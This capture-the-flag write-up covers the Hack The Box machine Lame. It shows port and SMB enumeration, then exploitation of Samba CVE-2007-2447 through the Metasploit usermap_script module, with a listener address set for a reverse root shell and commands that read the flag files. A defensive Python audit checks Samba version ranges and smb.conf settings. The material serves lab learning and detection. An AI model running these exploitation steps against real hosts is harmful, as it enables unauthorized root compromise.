
HackTheBox: Lame — Initial Access via Samba CVE-2007-2447


Platform: Hack The Box  |  Difficulty: Easy  |  OS: Linux

Overview

Lame is one of the first machines on HTB. It’s a great introduction to exploiting CVEs against real-world services. The target runs a vulnerable version of Samba (3.0.20) that allows unauthenticated remote code execution via the username field in the logon request.

Enumeration

Starting with a full port scan:

nmap -sV -sC -p- 10.10.10.3 --min-rate 5000

Key open ports: 21/tcp (vsftpd 2.3.4), 22/tcp (OpenSSH), 139/tcp & 445/tcp (Samba).

Checking Samba version:

smbclient -L //10.10.10.3 --no-pass

Exploitation — CVE-2007-2447

Samba 3.0.20 < 3.0.25rc3 is vulnerable to command injection via the username field when the non-default "username map script" option is set in smb.conf. It is directly exploitable with Metasploit:

use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST YOUR_IP
run

This drops us into a root shell without privilege escalation — the service runs as root.

Post-Exploitation

cat /root/root.txt
cat /home/makis/user.txt

Key Takeaways

  • Always check service versions against CVE databases during enumeration
  • Legacy Samba versions remain a critical attack surface in many environments
  • Network segmentation and timely patching mitigate this entirely
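
A defender-side check for the two conditions named under Exploitation, as an added example that is not part of the original writeup: it tests a Samba version string against the range quoted above and looks for "username map script" in smb.conf text. The function names, the sample config and the script path in it are constructed for illustration.

```python
import re

# Affected range as quoted in this writeup: 3.0.20 < 3.0.25rc3.
LOW, HIGH = "3.0.20", "3.0.25rc3"

def parse_version(text):
    """Return (major, minor, patch, rc); a final release sorts after any rc."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", text)
    if not m:
        raise ValueError(f"no Samba version in {text!r}")
    rc = int(m.group(4)) if m.group(4) else float("inf")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), rc)

def in_affected_range(version):
    return parse_version(LOW) <= parse_version(version) < parse_version(HIGH)

def find_param(conf_text, wanted="username map script"):
    """Return [(section, value)] for every place `wanted` is set.
    smb.conf parameter names are case-insensitive and ignore whitespace."""
    norm = lambda s: re.sub(r"\s+", "", s).lower()
    hits, section = [], ""
    # Join backslash-continued lines before parsing.
    for line in re.sub(r"\\\n", "", conf_text).splitlines():
        line = line.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line:
            name, value = line.split("=", 1)  # only the first '=' is significant
            if norm(name) == norm(wanted) and value.strip():
                hits.append((section, value.strip()))
    return hits

def audit(version, conf_text):
    """Flag a host only when both conditions from the writeup hold."""
    in_range, hits = in_affected_range(version), find_param(conf_text)
    return {"version_in_range": in_range, "map_script": hits,
            "exposed": in_range and bool(hits)}

# Constructed sample input; the script path is a placeholder.
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   UserName Map  Script = /etc/samba/scripts/mapusers.sh
"""

if __name__ == "__main__":
    print(audit("Samba 3.0.20-Debian", SAMPLE_CONF))
```

The normalisation in find_param matters for audits: a plain grep for the exact lowercase string misses spellings such as the mixed-case, double-spaced one in the sample.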